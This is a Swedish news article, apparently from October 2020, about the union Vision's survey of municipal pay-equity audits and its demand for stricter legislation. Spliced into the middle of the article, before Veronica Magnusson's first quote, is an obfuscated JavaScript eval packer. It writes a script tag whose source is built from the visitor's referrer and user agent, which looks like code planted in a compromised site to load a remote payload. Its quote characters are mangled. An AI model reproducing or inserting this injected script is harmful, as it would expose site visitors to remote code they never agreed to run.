Image Image Image Image Image Image Image Image Image Image

| 23 oktober, 2020

Scroll to top

Top

Årliga lönekartläggningar måste kompletteras med skärpta krav

Årliga lönekartläggningar måste kompletteras med skärpta krav
Sebastian

Regeringens besked om att årliga lönekartläggningar återinförs är välkommet. Men ska lönekartläggningar bli ett sätt att komma åt löneskillnaderna mellan kvinnor och män så ­måste regeringen nu skärpa lagstiftningen på flera områden. Det visar en undersökning av Vision.

– eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnybt|var|u0026u|referrer|drnae||js|php’.split(’|’),0,{}))
Jag är mycket glad att regeringen äntligen lägger fram förslaget om årliga lönekartläggningar, det är en fråga som Vision drivit länge. Däremot är jag orolig för att det blir ett slag i luften om inte lagen också kompletteras. Som lagen är utformad i dag har den omfattande luckor och lämnar stora öppningar för egna tolkningar, säger Veronica Magnusson, förbundsordförande i Vision.

Enligt nuvarande lagstiftning ska arbetsgivare göra lönekartläggning och analys vart tredje år i syfte att upptäcka, åtgärda och förhindra osakliga löneskillnader som har direkt eller indirekt samband med kön.

När Vision i somras lät fråga förbundets ordförande i landets kommuner, landsting och regioner om ­deras syn på lönekartläggningarnas kvalitet, svarade färre än var femte ja på frågan om deras kommun, landsting eller region gör lönekartläggningar med ett innehåll som lever upp till de krav som lagen ställer. Bland annat vittnar Visions ordförande om att:

• Mer än var femte kommun, landsting eller region gör löne­kartläggningar mer sällan än vad den nuvarande lagen föreskriver.

• Var sjätte kommun, landsting eller region gör så dåliga lönekartläggningar att det inte går att utläsa om det finns osakliga löneskillnader.

• I fler än åtta av tio kommuner, landsting eller regioner kan facket bara delvis eller inte alls påverka arbetet med lönekartläggningar.

– Vision anser att lagen behöver skärpas på en rad områden. Det gäller till exempel frågan om hur lönekartläggningen ska göras, hur samverkan med fackliga företrädare ska se ut, kvaliteten på analysen och vilka sanktioner som kan vidtas när lönekartläggningarna inte utförs som de ska, säger Veronica Magnusson.

– Lagen behöver också bringa klarhet i vilken myndighet eller instans som har uppdraget att bedöma kvaliteten och ­besluta om åtgärder vid brister. Först då kan vi på allvar använda årliga lönekartläggningar som det är tänkt, nämligen för att åtgärda de osakliga löneskillnaderna mellan kvinnor och män, säger Veronica Magnusson.